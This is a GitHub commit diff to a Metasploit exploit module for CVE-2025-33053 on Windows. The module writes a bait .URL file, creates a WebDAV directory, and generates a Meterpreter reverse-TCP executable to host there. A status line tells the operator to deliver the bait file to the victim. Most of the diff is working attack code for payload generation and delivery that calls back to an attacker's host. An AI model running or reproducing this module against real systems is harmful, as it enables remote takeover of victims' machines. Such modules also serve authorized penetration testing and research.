Skip to content

Commit dd51952

Browse files
DevBuiHieuDevBuiHieu
authored
Update cve_2025_33053.rb
1 parent f3c4d95 commit dd51952

File tree

1 file changed

+27
-19
lines changed

1 file changed

+27
-19
lines changed

modules/exploits/windows/fileformat/cve_2025_33053.rb

Lines changed: 27 additions & 19 deletions
Original file line numberDiff line numberDiff line change
@@ -1,10 +1,7 @@
1-
##
2-
# This module requires Metasploit: https://metasploit.com/download
3-
# Current source: https://github.com/rapid7/metasploit-framework
4-
##
1+
# frozen_string_literal: true
52

3+
# Metasploit module to exploit CVE-2025-33053 via malicious .URL and WebDAV payload hosting.
64
class MetasploitModule < Msf::Exploit::Remote
7-
include Msf::Exploit::Remote::HttpServer
85
Rank = NormalRanking
96

107
def initialize(info = {})
@@ -29,18 +26,7 @@ def initialize(info = {})
2926
],
3027
'Platform' => 'win',
3128
'Arch' => ARCH_X64,
32-
'Targets' => [
33-
[
34-
'Windows (generic)',
35-
{
36-
'Platform' => 'win',
37-
'Arch' => ARCH_X64,
38-
'DefaultOptions' => {
39-
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
40-
}
41-
}
42-
]
43-
],
29+
'Targets' => [['Windows (generic)', {}]],
4430
'DefaultTarget' => 0,
4531
'Notes' => {
4632
'Stability' => [CRASH_SAFE],
@@ -52,8 +38,9 @@ def initialize(info = {})
5238

5339
register_options(
5440
[
55-
OptString.new('FILENAME', [true, 'Output URL file name', 'bait.url']),
41+
OptString.new('OUTFILE', [true, 'Output URL file name', 'bait.url']),
5642
OptString.new('PAYLOAD_NAME', [true, 'Output payload file name', 'route.exe']),
43+
OptString.new('PAYLOAD', [true, 'Payload to generate', 'windows/x64/meterpreter/reverse_tcp']),
5744
OptBool.new('GEN_PAYLOAD', [true, 'Generate payload and move to WebDAV directory', true]),
5845
OptString.new('WEBDAV_DIR', [true, 'WebDAV directory path', '/var/www/webdav'])
5946
]
@@ -71,11 +58,21 @@ def initialize(info = {})
7158
end
7259

7360
def exploit
61+
prepare_webdav_dir
7462
generate_payload_if_needed
7563
write_url_file
7664
print_status("Module complete. Deliver #{File.expand_path(datastore['OUTFILE'])} to victim.")
7765
end
7866

67+
def prepare_webdav_dir
68+
print_status('Creating WebDAV directory if not exists...')
69+
FileUtils.mkdir_p(datastore['WEBDAV_DIR']) unless File.directory?(datastore['WEBDAV_DIR'])
70+
rescue Errno::EACCES
71+
fail_with(Failure::NoAccess,
72+
"Cannot create WebDAV directory. Permission denied.\n" \
73+
"Try restarting Metasploit with sudo or change ownership of #{datastore['WEBDAV_DIR']}.")
74+
end
75+
7976
def generate_payload_if_needed
8077
return unless datastore['GEN_PAYLOAD']
8178

@@ -85,9 +82,20 @@ def generate_payload_if_needed
8582
end
8683

8784
def generate_payload_exe(payload_name, lhost, lport, output_path)
88-
write_exe_file(output_path, payload.encoded)
85+
payload = framework.payloads.create(payload_name.to_s.strip)
86+
payload.datastore['LHOST'] = lhost
87+
payload.datastore['LPORT'] = lport
88+
raw = payload.generate
89+
exe = Msf::Util::EXE.to_win32pe(framework, raw)
90+
write_exe_file(output_path, exe)
8991
end
9092

93+
def write_exe_file(path, exe)
94+
File.open(path, 'wb') { |f| f.write(exe) }
95+
print_good("Payload successfully written to #{path}")
96+
rescue Errno::EACCES
97+
return_error(path)
98+
end
9199

92100
def write_url_file
93101
content = generate_url_content

0 commit comments

Comments
 (0)